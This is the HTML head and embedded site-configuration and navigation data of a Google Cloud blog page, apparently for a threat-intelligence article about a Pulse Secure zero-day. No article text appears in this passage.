<!doctype html><html lang="en-US" dir="ltr"><head><base href="https://cloud.google.com/blog/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><meta name="viewport" content="initial-scale=1, width=device-width"><meta name="track-metadata-page_hosting_platform" content="blog_boq"><meta name="mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="application-name" content="Google Cloud Blog"><meta name="apple-mobile-web-app-title" content="Google Cloud Blog"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="msapplication-tap-highlight" content="no"><link rel="preconnect" href="//fonts.googleapis.com"><link rel="preconnect" href="//fonts.gstatic.com"><link rel="preconnect" href="//www.gstatic.com"><link rel="preconnect" href="//storage.googleapis.com"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Google+Sans+Text_old:400,500,700,400i,500i,700i"><link rel="manifest" crossorigin="use-credentials" href="_/TransformBlogUi/manifest.json"><link rel="home" href="/?lfhs=2"><link rel="msapplication-starturl" href="/?lfhs=2"><link rel="icon" href="//www.gstatic.com/cloud/images/icons/favicon.ico" sizes="32x32"><link rel="apple-touch-icon-precomposed" href="//www.gstatic.com/cloud/images/icons/favicon.ico" sizes="32x32"><link rel="msapplication-square32x32logo" href="//www.gstatic.com/cloud/images/icons/favicon.ico" sizes="32x32"><script data-id="_gd" nonce="-49Bz_4wsckd3k4vDG-wCQ">window.WIZ_global_data = {"Bwo7Jf":"%.@.\"SG\",1]","CGQM5":"%.@.[[1]]]","DpimGf":false,"EP1ykd":["/_/*","/accounts/*","/transform","/transform/*"],"FdrFJe":"-6079753880330604664","Im6cmf":"/blog/_/TransformBlogUi","JvMKJd":"%.@.\"GTM-5CVQBG\",[[\"en\",\"\\u202aEnglish\\u202c\",true,\"en\"],[\"de\",\"\\u202aDeutsch\\u202c\",true,\"de\"],[\"es\",\"\\u202aEspañol\\u202c\",true,\"es\"],[\"es-419\",\"\\u202aEspañol (Latinoamérica)\\u202c\",true,\"es-419\"],[\"fr\",\"\\u202aFrançais\\u202c\",true,\"fr\"],[\"id\",\"\\u202aIndonesia\\u202c\",true,\"id\"],[\"it\",\"\\u202aItaliano\\u202c\",true,\"it\"],[\"pt-BR\",\"\\u202aPortuguês (Brasil)\\u202c\",true,\"pt-BR\"],[\"zh-CN\",\"\\u202a简体中文\\u202c\",true,\"zh-Hans\"],[\"zh-TW\",\"\\u202a繁體中文\\u202c\",true,\"zh-Hant\"],[\"ja\",\"\\u202a日本語\\u202c\",true,\"ja\"],[\"ko\",\"\\u202a한국어\\u202c\",true,\"ko\"]],[\"83405\",\"AIzaSyD3LJeW4Q6gtdgJlyeFZUp-GhpIoc6EUeg\"],\"en\",null,null,[],[[\"https://cloud.google.com/innovators\",\"https://cloud.google.com/innovators/plus/activate\",\"https://cloud.google.com/innovators/innovatorsplus\"],[\"https://workspace.google.com/pricing\",\"https://www.x.com/googleworkspace\",\"https://www.facebook.com/googleworkspace\",\"https://www.youtube.com/channel/UCBmwzQnSoj9b6HzNmFrg_yw\",\"https://www.instagram.com/googleworkspace\",\"https://www.linkedin.com/showcase/googleworkspace\",\"https://about.google/?utm_source\\u003dworkspace.google.com\\u0026utm_medium\\u003dreferral\\u0026utm_campaign\\u003dgsuite-footer-en\",\"https://about.google/products/?tip\\u003dexplore\",\"https://workspace.google.com\",\"https://workspace.google.com/contact/?source\\u003dgafb-form-globalnav-en\",\"https://workspace.google.com/business/signup/welcome?hl\\u003den\\u0026source\\u003dgafb-form-globalnav-en\",\"https://workspace.google.com/blog\"],[\"https://www.cloudskillsboost.google\",\"https://www.cloudskillsboost.google?utm_source\\u003dcgc\\u0026utm_medium\\u003dwebsite\\u0026utm_campaign\\u003devergreen\",\"https://www.cloudskillsboost.google/subscriptions?utm_source\\u003dcgc\\u0026utm_medium\\u003dwebsite\\u0026utm_campaign\\u003devergreenlaunchpromo\",\"https://www.cloudskillsboost.google/subscriptions?utm_source\\u003dcgc\\u0026utm_medium\\u003dwebsite\\u0026utm_campaign\\u003devergreen\",\"https://www.cloudskillsboost.google/catalog?utm_source\\u003dcgc\\u0026utm_medium\\u003dwebsite\\u0026utm_campaign\\u003devergreen\",\"https://www.cloudskillsboost.google/paths?utm_source\\u003dcgc\\u0026utm_medium\\u003dwebsite\\u0026utm_campaign\\u003devergreen\"],[\"https://mapsplatform.google.com\"],[\"https://cloud.google.com/developers\",\"https://cloud.google.com/developers/settings?utm_source\\u003dinnovators\"],[\"https://console.cloud.google.com/freetrial\",\"https://console.cloud.google.com/\",\"https://console.cloud.google.com/freetrial?redirectPath\\u003dhttps://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day/\"],[\"https://aitestkitchen.withgoogle.com/signup\",\"https://blog.google/technology/ai/join-us-in-the-ai-test-kitchen/\",\"https://cloud.google.com/ai\"],[\"https://googlecloudplatform.blogspot.com/\",\"https://github.com/GoogleCloudPlatform\",\"https://www.linkedin.com/company/google-cloud\",\"https://twitter.com/GoogleCloud_sg\",\"https://www.facebook.com/googlecloud\",\"https://www.youtube.com/GoogleCloudAPAC\"]],[2024,11,24],[[\"en\",\"x-default\"],\"x-default\"],[null,true],null,\"/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day/?hl\\u003den\",[\"6LcsrxUqAAAAAFhpR1lXsPN2j2nsTwy6JTbRKzJr\"]]","LVIXXb":1,"LoQv7e":false,"M55kSc":"%.@.]","MT7f9b":[],"MUE6Ne":"TransformBlogUi","PylxI":"%.@.\"cloudblog\",\"topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\",[\"en\",\"de\",\"fr\",\"ko\",\"ja\"],\"en\",null,\"https://cloud.google.com/blog\",\"blog_article\",\"cloud.google.com\",[\"https://console.cloud.google.com/freetrial/\",\"https://cloud.google.com/contact/\",\"https://cloud.google.com/\",\"https://cloud.google.com/blog\",\"https://cloud.google.com/\",\"https://www.google.com/\",\"https://cloud.google.com/products/\",\"https://about.google.com/products/\",\"https://about.google/intl/en/\",\"https://support.google.com\"],[\"googlecloud\",\"googlecloud\",\"showcase/google-cloud\",\"googlecloud/\",\"googlecloud/\"],true]","QrtxK":"","S06Grb":"","S6lZl":105833389,"TSDtV":"%.@.[[null,[[45449436,null,false,null,null,null,\"NCoWOd\"],[45667527,null,false,null,null,null,\"Qzt9sd\"],[45449424,null,null,null,\"default\",null,\"PB4oCc\"],[45532645,null,true,null,null,null,\"wFnpse\"],[45643590,null,false,null,null,null,\"w7jzef\"],[45449433,null,true,null,null,null,\"BotAtd\"],[45662378,null,true,null,null,null,\"DG71uf\"],[45449442,null,true,null,null,null,\"dsKk4d\"],[45449449,null,true,null,null,null,\"b5B1L\"],[45663339,null,false,null,null,null,\"OEmSkb\"],[45664956,null,false,null,null,null,\"aeNUHe\"],[45459555,null,false,null,null,null,\"Imeoqb\"],[45646404,null,false,null,null,null,\"tfPPe\"],[45651445,null,false,null,null,null,\"XzXOC\"],[45449440,null,false,null,null,null,\"j9nUqf\"],[45631885,null,false,null,null,null,\"kG32O\"],[45449445,null,true,null,null,null,\"C4H3Td\"],[45649370,null,false,null,null,null,\"LibkZ\"],[45657332,null,true,null,null,null,\"oBUucf\"],[45449438,null,false,null,null,null,\"m0uJSe\"],[45449471,null,null,null,\"default\",null,\"Ammqqf\"],[45612748,null,false,null,null,null,\"fdXYmb\"],[45449467,null,null,null,\"variant4\",null,\"qL2Vf\"],[45449469,null,null,null,\"default\",null,\"mBNY1\"],[45449443,null,false,null,null,null,\"wvKxS\"],[45616194,null,false,null,null,null,\"y3jdm\"],[45449434,null,true,null,null,null,\"PvZHQ\"],[45449428,null,null,null,\"default\",null,\"cbPi4d\"],[45664077,null,false,null,null,null,\"w1axY\"],[45449423,null,null,null,\"default\",null,\"FIJFKf\"],[45449450,null,false,null,null,null,\"PTNaKe\"],[45632110,null,true,null,null,null,\"QK58Od\"],[45449435,null,false,null,null,null,\"s7Z7Ld\"],[45449446,null,true,null,null,null,\"ktxJzc\"],[45449468,null,null,null,\"variant4\",null,\"BUEcUe\"],[45659313,null,false,null,null,null,\"i2rGv\"],[45532646,null,true,null,null,null,\"RIvlU\"],[45449439,null,true,null,null,null,\"lsuui\"],[45650156,null,false,null,null,null,\"Pr5Lcf\"],[45449422,null,null,null,\"default\",null,\"epsxQe\"],[45628378,null,true,null,null,null,\"hRRuzd\"],[45651724,null,true,null,null,null,\"xYDLRc\"],[45662552,null,false,null,null,null,\"epuB3d\"],[45449444,null,true,null,null,null,\"HGJqie\"],[45655733,null,true,null,null,null,\"xPTOyb\"],[45663526,null,false,null,null,null,\"kG33G\"]],\"CAMSIB0Z7s2IEJr+BOrvF/2KA82ttBKhkOMGCLWcDQjK9Q15\"]]]","UUFaWc":"%.@.null,1000,2]","Vvafkd":false,"Yllh3e":"%.@.1732460298159204,58923287,4129926886]","aAofAd":"%.@.[[[\"Solutions \\u0026 technology\",null,[[[\"AI \\u0026 Machine Learning\",\"/blog/products/ai-machine-learning\"],[\"API Management\",\"/blog/products/api-management\"],[\"Application Development\",\"/blog/products/application-development\"],[\"Application Modernization\",\"/blog/products/application-modernization\"],[\"Chrome Enterprise\",\"/blog/products/chrome-enterprise\"],[\"Compute\",\"/blog/products/compute\"],[\"Containers \\u0026 Kubernetes\",\"/blog/products/containers-kubernetes\"],[\"Data Analytics\",\"/blog/products/data-analytics\"],[\"Databases\",\"/blog/products/databases\"],[\"DevOps \\u0026 SRE\",\"/blog/products/devops-sre\"],[\"Maps \\u0026 Geospatial\",\"/blog/topics/maps-geospatial\"],[\"Security\",null,[[[\"Security \\u0026 Identity\",\"/blog/products/identity-security\"],[\"Threat Intelligence\",\"/blog/topics/threat-intelligence\"]]]],[\"Infrastructure\",\"/blog/products/infrastructure\"],[\"Infrastructure Modernization\",\"/blog/products/infrastructure-modernization\"],[\"Networking\",\"/blog/products/networking\"],[\"Productivity \\u0026 Collaboration\",\"/blog/products/productivity-collaboration\"],[\"SAP on Google Cloud\",\"/blog/products/sap-google-cloud\"],[\"Storage \\u0026 Data Transfer\",\"/blog/products/storage-data-transfer\"],[\"Sustainability\",\"/blog/topics/sustainability\"]]]],[\"Ecosystem\",null,[[[\"IT Leaders\",\"/transform\"],[\"Industries\",null,[[[\"Financial Services\",\"/blog/topics/financial-services\"],[\"Healthcare \\u0026 Life Sciences\",\"/blog/topics/healthcare-life-sciences\"],[\"Manufacturing\",\"/blog/topics/manufacturing\"],[\"Media \\u0026 Entertainment\",\"/blog/products/media-entertainment\"],[\"Public Sector\",\"/blog/topics/public-sector\"],[\"Retail\",\"/blog/topics/retail\"],[\"Supply Chain\",\"/blog/topics/supply-chain-logistics\"],[\"Telecommunications\",\"/blog/topics/telecommunications\"]]]],[\"Partners\",\"/blog/topics/partners\"],[\"Startups \\u0026 SMB\",\"/blog/topics/startups\"],[\"Training \\u0026 Certifications\",\"/blog/topics/training-certifications\"],[\"Inside Google Cloud\",\"/blog/topics/inside-google-cloud\"],[\"Google Cloud Next \\u0026 Events\",\"/blog/topics/google-cloud-next\"],[\"Google Maps Platform\",\"https://mapsplatform.google.com/resources/blog/\"],[\"Google Workspace\",\"https://workspace.google.com/blog\"]]]],[\"Developers \\u0026 Practitioners\",\"/blog/topics/developers-practitioners\"],[\"Transform with Google Cloud\",\"/transform\"]]],[[\"de\",[[[\"Neuigkeiten\",\"/blog/de/topics/whats-new/aktuelles-auf-dem-google-cloud-blog\"],[\"Lösungen \\u0026 Technologien\",null,[[[\"Anwendungsentwicklung\",\"/blog/de/products/application-development\"],[\"Anwendungsmodernisierung\",\"/blog/de/products/anwendungsmodernisierung\"],[\"API-Verwaltung\",\"/blog/de/products/api-management\"],[\"Chrome Enterprise\",\"/blog/de/products/chrome-enterprise\"],[\"Computing\",\"/blog/de/products/compute\"],[\"Containers \\u0026 Kubernetes\",\"/blog/de/products/containers-kubernetes\"],[\"Datenanalysen\",\"/blog/de/products/data-analytics\"],[\"Datenbanken\",\"/blog/de/products/databases\"],[\"DevOps \\u0026 SRE\",\"/blog/de/products/devops-sre\"],[\"Infrastruktur\",\"/blog/de/products/infrastructure\"],[\"KI \\u0026 Machine Learning\",\"/blog/de/products/ai-machine-learning\"],[\"Maps \\u0026 Geospatial\",\"/blog/de/topics/maps-geospatial\"],[\"Modernisierung der Infrastruktur\",\"/blog/de/products/modernisierung-der-infrastruktur\"],[\"Nachhaltigkeit\",\"/blog/de/topics/nachhaltigkeit\"],[\"Netzwerk\",\"/blog/de/products/networking\"],[\"Produktivität und Zusammenarbeit\",\"/blog/de/products/produktivitaet-und-kollaboration\"],[\"SAP in Google Cloud\",\"/blog/de/products/sap-google-cloud\"],[\"Sicherheit \\u0026 Identität\",\"/blog/de/products/identity-security\"],[\"Speicher und Datentransfer\",\"/blog/de/products/storage-data-transfer\"]]]],[\"Ökosystem\",null,[[[\"IT Leader\",\"/transform/de\"],[\"Industrien\",null,[[[\"Behörden und öffentlicher Sektor\",\"/blog/de/topics/public-sector\"],[\"Einzelhandel\",\"/blog/de/topics/retail\"],[\"Fertigung\",\"/blog/de/topics/fertigung\"],[\"Finanzdienstleistungen\",\"/blog/de/topics/financial-services\"],[\"Gesundheitswesen und Biowissenschaften\",\"/blog/de/topics/healthcare-life-sciences\"],[\"Lieferkette und Logistik\",\"/blog/de/topics/lieferkette-und-logistik\"],[\"Medien und Unterhaltung\",\"/blog/de/products/media-entertainment\"],[\"Telekommunikation\",\"/blog/de/topics/telecommunications\"]]]],[\"Entwickler*innen \\u0026 Fachkräfte\",\"/blog/de/topics/developers-practitioners\"],[\"Google Cloud Next \\u0026 Events\",\"/blog/de/topics/events\"],[\"Google Maps Platform\",\"/blog/de/products/maps-platform\"],[\"Google Workspace\",\"https://workspace.google.com/blog/de\"],[\"Inside Google Cloud\",\"/blog/de/topics/inside-google-cloud\"],[\"Kunden\",\"/blog/de/topics/kunden\"],[\"Partner\",\"/blog/de/topics/partners\"],[\"Start-ups und KMU\",\"/blog/de/topics/startups\"],[\"Training und Zertifizierung\",\"/blog/de/topics/training-certifications\"]]]],[\"Transformation mit Google Cloud\",\"/transform/de\"]]]],[\"en\",[[[\"Solutions \\u0026 technology\",null,[[[\"AI \\u0026 Machine Learning\",\"/blog/products/ai-machine-learning\"],[\"API Management\",\"/blog/products/api-management\"],[\"Application Development\",\"/blog/products/application-development\"],[\"Application Modernization\",\"/blog/products/application-modernization\"],[\"Chrome Enterprise\",\"/blog/products/chrome-enterprise\"],[\"Compute\",\"/blog/products/compute\"],[\"Containers \\u0026 Kubernetes\",\"/blog/products/containers-kubernetes\"],[\"Data Analytics\",\"/blog/products/data-analytics\"],[\"Databases\",\"/blog/products/databases\"],[\"DevOps \\u0026 SRE\",\"/blog/products/devops-sre\"],[\"Maps \\u0026 Geospatial\",\"/blog/topics/maps-geospatial\"],[\"Security\",null,[[[\"Security \\u0026 Identity\",\"/blog/products/identity-security\"],[\"Threat Intelligence\",\"/blog/topics/threat-intelligence\"]]]],[\"Infrastructure\",\"/blog/products/infrastructure\"],[\"Infrastructure Modernization\",\"/blog/products/infrastructure-modernization\"],[\"Networking\",\"/blog/products/networking\"],[\"Productivity \\u0026 Collaboration\",\"/blog/products/productivity-collaboration\"],[\"SAP on Google Cloud\",\"/blog/products/sap-google-cloud\"],[\"Storage \\u0026 Data Transfer\",\"/blog/products/storage-data-transfer\"],[\"Sustainability\",\"/blog/topics/sustainability\"]]]],[\"Ecosystem\",null,[[[\"IT Leaders\",\"/transform\"],[\"Industries\",null,[[[\"Financial Services\",\"/blog/topics/financial-services\"],[\"Healthcare \\u0026 Life Sciences\",\"/blog/topics/healthcare-life-sciences\"],[\"Manufacturing\",\"/blog/topics/manufacturing\"],[\"Media \\u0026 Entertainment\",\"/blog/products/media-entertainment\"],[\"Public Sector\",\"/blog/topics/public-sector\"],[\"Retail\",\"/blog/topics/retail\"],[\"Supply Chain\",\"/blog/topics/supply-chain-logistics\"],[\"Telecommunications\",\"/blog/topics/telecommunications\"]]]],[\"Partners\",\"/blog/topics/partners\"],[\"Startups \\u0026 SMB\",\"/blog/topics/startups\"],[\"Training \\u0026 Certifications\",\"/blog/topics/training-certifications\"],[\"Inside Google Cloud\",\"/blog/topics/inside-google-cloud\"],[\"Google Cloud Next \\u0026 Events\",\"/blog/topics/google-cloud-next\"],[\"Google Maps Platform\",\"https://mapsplatform.google.com/resources/blog/\"],[\"Google Workspace\",\"https://workspace.google.com/blog\"]]]],[\"Developers \\u0026 Practitioners\",\"/blog/topics/developers-practitioners\"],[\"Transform with Google Cloud\",\"/transform\"]]]],[\"fr\",[[[\"Les tendances\",\"/blog/fr/topics/les-tendances/quelles-sont-les-nouveautes-de-google-cloud\"],[\"Solutions et Technologie\",null,[[[\"Analyse de données\",\"/blog/fr/products/analyse-de-donnees/\"],[\"Bases de données\",\"/blog/fr/products/databases\"],[\"Calcul\",\"/blog/fr/products/calcul/\"],[\"Chrome Entreprise\",\"/blog/fr/products/chrome-enterprise/\"],[\"Conteneurs et Kubernetes\",\"/blog/fr/products/conteneurs-et-kubernetes/\"],[\"Développement d\u0027Applications\",\"/blog/fr/products/application-development\"],[\"Développement durable\",\"/blog/fr/topics/developpement-durable\"],[\"DevOps et ingénierie SRE\",\"/blog/fr/products/devops-sre\"],[\"Gestion des API\",\"/blog/fr/products/api-management\"],[\"IA et Machine Learning\",\"/blog/fr/products/ai-machine-learning\"],[\"Infrastructure\",\"/blog/fr/products/infrastructure\"],[\"Maps et Géospatial\",\"/blog/fr/topics/maps-geospatial\"],[\"Modernisation d\u0027Applications\",\"/blog/fr/products/modernisation-dapplications/\"],[\"Modernisation d\u0027Infrastructure\",\"/blog/fr/products/modernisation-dinfrastructure/\"],[\"Networking\",\"/blog/fr/products/networking\"],[\"Productivité et Collaboration\",\"/blog/fr/products/productivite-et-collaboration\"],[\"SAP sur Google Cloud\",\"/blog/fr/products/sap-google-cloud\"],[\"Sécurité et Identité\",\"/blog/fr/products/identity-security\"],[\"Stockage et transfert de données\",\"/blog/fr/products/storage-data-transfer\"]]]],[\"Écosystème\",null,[[[\"Responsables IT\",\"/transform/fr\"],[\"Industries\",null,[[[\"Commerce\",\"/blog/fr/topics/retail\"],[\"Manufacturing\",\"/blog/fr/topics/manufacturing\"],[\"Médias et Divertissement\",\"/blog/fr/products/media-entertainment\"],[\"Santé\",\"/blog/fr/topics/healthcare-life-sciences\"],[\"Secteur Public\",\"/blog/fr/topics/public-sector\"],[\"Services Financiers\",\"/blog/fr/topics/financial-services\"],[\"Supply Chain\",\"/blog/fr/topics/supply-chain/\"],[\"Telecommunications\",\"/blog/fr/topics/telecommunications\"]]]],[\"Clients\",\"/blog/fr/topics/clients/\"],[\"Développeurs et professionnels\",\"/blog/fr/topics/developers-practitioners\"],[\"Formations et certifications\",\"/blog/fr/topics/training-certifications\"],[\"Google Cloud Next et Événements\",\"/blog/fr/topics/evenements\"],[\"Google Maps Platform\",\"/blog/fr/products/maps-platform\"],[\"Google Workspace\",\"https://workspace.google.com/blog/fr\"],[\"Inside Google Cloud\",\"/blog/fr/topics/inside-google-cloud\"],[\"Partenaires\",\"/blog/fr/topics/partners\"],[\"Start-ups et PME\",\"/blog/fr/topics/startups\"]]]],[\"Transformer avec Google Cloud\",\"/transform/fr\"]]]],[\"ja\",[[[\"ソリューションとテクノロジー\",null,[[[\"AI \\u0026 機械学習\",\"/blog/ja/products/ai-machine-learning\"],[\"API 管理\",\"/blog/ja/products/api-management\"],[\"アプリケーション開発\",\"/blog/ja/products/application-development\"],[\"アプリケーション モダナイゼーション\",\"/blog/ja/products/application-modernization\"],[\"Chrome Enterprise\",\"/blog/ja/products/chrome-enterprise\"],[\"コンピューティング\",\"/blog/ja/products/compute\"],[\"Containers \\u0026 Kubernetes\",\"/blog/ja/products/containers-kubernetes\"],[\"データ分析\",\"/blog/ja/products/data-analytics\"],[\"データベース\",\"/blog/ja/products/databases\"],[\"DevOps \\u0026 SRE\",\"/blog/ja/products/devops-sre\"],[\"Maps \\u0026 Geospatial\",\"/blog/ja/products/maps-platform\"],[\"セキュリティ\",null,[[[\"セキュリティ \\u0026 アイデンティティ\",\"/blog/ja/products/identity-security\"],[\"脅威インテリジェンス\",\"/blog/ja/topics/threat-intelligence\"]]]],[\"インフラストラクチャ\",\"/blog/ja/products/infrastructure\"],[\"インフラ モダナイゼーション\",\"/blog/ja/products/infrastructure-modernization\"],[\"ネットワーキング\",\"/blog/ja/products/networking\"],[\"生産性とコラボレーション\",\"/blog/ja/products/productivity-collaboration\"],[\"Google Cloud での SAP\",\"/blog/ja/products/sap-google-cloud\"],[\"ストレージとデータ転送\",\"/blog/ja/products/storage-data-transfer\"],[\"サステナビリティ\",\"/blog/ja/topics/sustainability\"]]]],[\"エコシステム\",null,[[[\"ITリーダー\",\"/transform/ja\"],[\"業種\",null,[[[\"金融サービス\",\"/blog/ja/topics/financial-services\"],[\"ヘルスケア、ライフ サイエンス\",\"/blog/ja/topics/healthcare-life-sciences\"],[\"製造\",\"/blog/ja/topics/manufacturing\"],[\"メディア、エンターテイメント\",\"/blog/ja/products/media-entertainment\"],[\"公共部門\",\"/blog/ja/topics/public-sector\"],[\"小売業\",\"/blog/ja/topics/retail\"],[\"サプライ チェーン\",\"/blog/ja/topics/supply-chain-logistics\"],[\"通信\",\"/blog/ja/topics/telecommunications\"]]]],[\"顧客事例\",\"/blog/ja/topics/customers\"],[\"パートナー\",\"/blog/ja/topics/partners\"],[\"スタートアップ \\u0026 SMB\",\"/blog/ja/topics/startups\"],[\"トレーニングと認定\",\"/blog/ja/topics/training-certifications\"],[\"Inside Google Cloud\",\"/blog/ja/topics/inside-google-cloud\"],[\"Google Cloud Next と イベント\",\"/blog/ja/topics/google-cloud-next\"],[\"Google Maps Platform\",\"/blog/ja/products/maps-platform\"],[\"Google Workspace\",\"https://workspace.google.com/blog/ja\"]]]],[\"デベロッパー\",\"/blog/ja/topics/developers-practitioners\"],[\"Transform with Google Cloud\",\"/transform/ja\"]]]],[\"ko\",[[[\"솔루션 및 기술\",null,[[[\"AI 및 머신러닝\",\"/blog/ko/products/ai-machine-learning\"],[\"API 관리\",\"/blog/ko/products/api-management\"],[\"애플리케이션 개발\",\"/blog/ko/products/application-development\"],[\"애플리케이션 현대화\",\"/blog/ko/products/application-modernization\"],[\"Chrome Enterprise\",\"/blog/products/chrome-enterprise\"],[\"컴퓨팅\",\"/blog/ko/products/compute\"],[\"컨테이너 \\u0026 Kubernetes\",\"/blog/ko/products/containers-kubernetes\"],[\"데이터 분석\",\"/blog/ko/products/data-analytics\"],[\"데이터베이스\",\"/blog/ko/products/databases\"],[\"DevOps 및 SRE\",\"/blog/ko/products/devops-sre\"],[\"Maps \\u0026 Geospatial\",\"/blog/ko/products/maps-platform\"],[\"보안\",null,[[[\"보안 \\u0026 아이덴티티\",\"/blog/ko/products/identity-security\"],[\"위협 인텔리전스\",\"/blog/ko/topics/threat-intelligence\"]]]],[\"인프라\",\"/blog/ko/products/infrastructure\"],[\"Infrastructure Modernization\",\"/blog/ko/products/infrastructure-modernization\"],[\"네트워킹\",\"/blog/ko/products/networking\"],[\"생산성 및 공동작업\",\"/blog/ko/products/productivity-collaboration\"],[\"SAP on Google Cloud\",\"/blog/ko/products/sap-google-cloud\"],[\"스토리지 및 데이터 전송\",\"/blog/ko/products/storage-data-transfer\"],[\"지속가능성\",\"/blog/ko/topics/sustainability\"]]]],[\"에코시스템\",null,[[[\"IT Leaders\",\"/transform/ko\"],[\"업종\",null,[[[\"금융 서비스\",\"/blog/ko/topics/financial-services\"],[\"의료 및 생명과학\",\"/blog/ko/topics/healthcare-life-sciences\"],[\"제조업\",\"/blog/ko/topics/manufacturing\"],[\"미디어 및 엔터테인먼트\",\"/blog/ko/products/media-entertainment\"],[\"공공부문\",\"/blog/ko/topics/public-sector\"],[\"소매업\",\"/blog/ko/topics/retail\"],[\"공급망\",\"/blog/topics/supply-chain-logistics\"],[\"통신\",\"/blog/ko/topics/telecommunications\"]]]],[\"고객 사례\",\"/blog/ko/topics/customers\"],[\"파트너\",\"/blog/ko/topics/partners\"],[\"스타트업 \\u0026 SMB\",\"/blog/ko/topics/startups\"],[\"교육 \\u0026 인증\",\"/blog/ko/topics/training-certifications\"],[\"Inside Google Cloud\",\"/blog/ko/topics/inside-google-cloud\"],[\"Google Cloud Next 및 이벤트\",\"/blog/ko/topics/google-cloud-next\"],[\"Google Maps Platform\",\"/blog/ko/products/maps-platform\"],[\"Google Workspace\",\"https://workspace.google.com/blog/ko\"]]]],[\"개발 및 IT운영\",\"/blog/ko/topics/developers-practitioners\"],[\"Google Cloud와 함께 하는 디지털 혁신\",\"/transform/ko\"]]]]]]","cfb2h":"boq_cloudx-web-blog-uiserver_20241121.08_p0","eptZe":"/blog/_/TransformBlogUi/","f8POw":"%.@.[48887080,97684533,97863170,97785986,93778619,1706538,1714256,97656897,48830069,97863043,48554503,97535270,97517170,48897392,97442197,93874002,48489833,97716269,48887064,97684517,97785970,97656881,97517154,97442181,93873986],null,null,null,null,true]","fPDxwd":[97517170,97684533,97863043,97863170],"gGcLoe":false,"iCzhFc":false,"nQyAE":{"b5B1L":"true","PTNaKe":"false","ktxJzc":"true","BUEcUe":"variant4","XzXOC":"false","kG32O":"false","C4H3Td":"true","w1axY":"false","Pr5Lcf":"false","kG33G":"false","OEmSkb":"false","aeNUHe":"false","j9nUqf":"false","wvKxS":"false","wFnpse":"true","tfPPe":"false","LibkZ":"false","m0uJSe":"false","PvZHQ":"true","s7Z7Ld":"false","i2rGv":"false","RIvlU":"true","lsuui":"true","HGJqie":"true","NCoWOd":"false","Qzt9sd":"false","dsKk4d":"true","fdXYmb":"false","epuB3d":"false","BotAtd":"true"},"p9hQne":"https://www.gstatic.com/_/boq-cloudx-web-blog/_/r/","qwAQke":"TransformBlogUi","rtQCxc":-480,"u4g7r":"%.@.null,1000,2]","vJ2GOe":"%.@.null,[[\"de\",[[[\"Themen\",null,[[[\"Product Announcements\",\"/blog/de/product-announcements\"],[\"KI \\u0026 Machine Learning\",\"/blog/de/ai-machine-learning\"],[\"Produktivität und Kollaboration\",\"/blog/de/productivity-collaboration\"],[\"Identität und Sicherheit\",\"/blog/de/identity-and-security\"],[\"Future of Work\",\"/blog/de/future-of-work\"],[\"Hybrides Arbeiten\",\"/blog/de/hybrid-work\"],[\"Kundenreferenzen\",\"/blog/de/customer-stories\"],[\"Entwickler*innen und Fachkräfte\",\"/blog/de/developers-practitioners\"],[\"Partner\",\"/blog/de/partners\"],[\"Events\",\"/blog/de/events\"],[\"Öffentlicher Sektor\",\"/blog/de/public-sector\"]]]],[\"Produktneuigkeiten\",null,[[[\"Gmail\",\"/blog/de/gmail\"],[\"Meet\",\"/blog/de/meet\"],[\"Chat and Spaces\",\"/blog/de/chat-spaces\"],[\"Drive\",\"/blog/de/drive\"],[\"Docs\",\"/blog/de/docs\"],[\"Sheets\",\"/blog/de/sheets\"]]]]]]],[\"en\",[[[\"Topics\",null,[[[\"Product Announcements\",\"/blog/product-announcements\"],[\"AI and Machine Learning\",\"/blog/ai-machine-learning\"],[\"Productivity and Collaboration\",\"/blog/productivity-collaboration\"],[\"Identity and Security\",\"/blog/identity-and-security\"],[\"Future of Work\",\"/blog/future-of-work\"],[\"Hybrid Work\",\"/blog/hybrid-work\"],[\"Customer Stories\",\"/blog/customer-stories\"],[\"Developers and Practitioners\",\"/blog/developers-practitioners\"],[\"Partners\",\"/blog/partners\"],[\"Events\",\"/blog/events\"],[\"Public Sector\",\"/blog/public-sector\"]]]],[\"Product News\",null,[[[\"Gmail\",\"/blog/gmail\"],[\"Meet\",\"/blog/meet\"],[\"Chat and Spaces\",\"/blog/chat-spaces\"],[\"Drive\",\"/blog/drive\"],[\"Docs\",\"/blog/docs\"],[\"Sheets\",\"/blog/sheets\"]]]]]]],[\"fr\",[[[\"Thèmes\",null,[[[\"Product Announcements\",\"/blog/fr/product-announcements\"],[\"IA et Machine Learning\",\"/blog/fr/ai-machine-learning\"],[\"Productivité et Collaboration\",\"/blog/fr/productivity-collaboration\"],[\"Identité et Sécurité\",\"/blog/fr/identity-and-security\"],[\"L\u0027avenir du travail\",\"/blog/fr/future-of-work\"],[\"Travail hybride\",\"/blog/fr/hybrid-work\"],[\"Témoignages Clients\",\"/blog/fr/customer-stories\"],[\"Développeurs et professionnels\",\"/blog/fr/developers-practitioners\"],[\"Partenaires\",\"/blog/fr/partners\"],[\"Événements\",\"/blog/fr/events\"],[\"Secteur Public\",\"/blog/fr/public-sector\"]]]],[\"Annonces sur les produits\",null,[[[\"Gmail\",\"/blog/fr/gmail\"],[\"Meet\",\"/blog/fr/meet\"],[\"Chat et Spaces\",\"/blog/fr/chat-spaces\"],[\"Drive\",\"/blog/fr/drive\"],[\"Docs\",\"/blog/fr/docs\"],[\"Sheets\",\"/blog/fr/sheets\"]]]]]]],[\"ja\",[[[\"トピック\",null,[[[\"プロダクトの発表\",\"/blog/ja/product-announcements\"],[\"AI \\u0026 